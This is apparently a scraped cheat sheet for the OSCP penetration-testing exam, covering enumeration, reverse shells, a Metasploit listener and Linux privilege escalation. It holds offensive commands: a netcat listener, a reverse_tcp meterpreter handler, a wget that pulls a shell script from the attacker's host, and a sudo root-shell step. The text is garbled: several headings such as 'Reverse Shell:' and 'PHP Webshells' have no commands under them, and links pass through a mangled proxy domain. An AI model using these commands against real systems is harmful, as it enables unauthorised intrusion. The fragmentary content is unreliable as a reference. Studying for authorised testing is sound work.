OSCP_CheatSheet_-_Hacklivly
OSCP_CheatSheet_-_Hacklivly
The Offensive Security Certified Professional (OSCP) is one of the toughest and
most respected certifications in cybersecurity. Whether you’re preparing for the
exam or working on real-world penetration testing, having a
structured cheatsheet is essential. This guide covers everything
from enumeration to privilege escalation, including shells, payloads, and port
forwarding. 🚀
—
Using Telnet
curl -I http://<target>
ftp <target>
Port 22 - SSH
Check for weak credentials:
Port 53 - DNS
Check for zone transfer:
Port 79 - Finger
finger @<target>
nc <target> 110
smbclient -L //<target>/ -N
showmount -e <target>
nc -lvnp 4444
Metasploit Listener:
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set LHOST <your-ip>
Linux Shells
Reverse Shell:
Windows Shells
PowerShell Reverse Shell:
PHP Webshells
export TERM=xterm-256color
stty raw -echo; fg
echo $SHELL
or
wget http://<your-ip>:8080/shell.sh
Windows (Chisel)
https://github.com/SecWiki/windows-kernel-exploits
sudo -l
sudo /bin/bash
https://github.com/SecWiki/linux-kernel-exploits
🎯 Final Thoughts
The OSCP exam is about methodology, patience, and persistence. Use this
cheatsheet, document everything, and try harder! 💪
🔥 Good luck with your OSCP journey! 🚀